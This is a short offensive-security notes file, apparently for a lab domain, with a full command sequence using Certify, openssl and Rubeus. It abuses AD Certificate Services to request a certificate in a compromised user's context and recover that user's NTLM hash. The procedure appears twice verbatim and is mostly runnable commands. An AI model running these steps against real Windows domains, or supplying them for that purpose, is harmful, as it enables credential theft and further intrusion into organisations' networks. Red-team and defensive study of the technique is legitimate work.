b4cktr4ck2/Notes.txt

## Notes.txt
If you're in a user's context where you don't have their password (I.e they ran a beacon/steal_token/other stuff) and ADCS is enabled,  you can use Certify + Rubeus to request a certificate and get their NTLM hash.

1. Certify.exe request /ca:DC01.alexlab.local\alexlab-DC01-CA
2. Copypaste everything from BEGIN RSA PRIVATE KEY to END CERTIFICATE to a file ending in .pem onto a Linux box
3. Run openssl pkcs12 -in filename.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
4. Upload the PFX file into your beacon or base64 encode it with base64 cert.pfx -w 0
5. Run Rubeus.exe asktgt /getcredentials /user:youruser /certificate:test.pfx /domain:alexlab.local /dc:dc01 /show
^Can substitute base64 string instead of uploading pfx.
	If you're in a user's context where you don't have their password (I.e they ran a beacon/steal_token/other stuff) and ADCS is enabled, you can use Certify + Rubeus to request a certificate and get their NTLM hash.

	1. Certify.exe request /ca:DC01.alexlab.local\alexlab-DC01-CA
	2. Copypaste everything from BEGIN RSA PRIVATE KEY to END CERTIFICATE to a file ending in .pem onto a Linux box
	3. Run openssl pkcs12 -in filename.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
	4. Upload the PFX file into your beacon or base64 encode it with base64 cert.pfx -w 0
	5. Run Rubeus.exe asktgt /getcredentials /user:youruser /certificate:test.pfx /domain:alexlab.local /dc:dc01 /show
	^Can substitute base64 string instead of uploading pfx.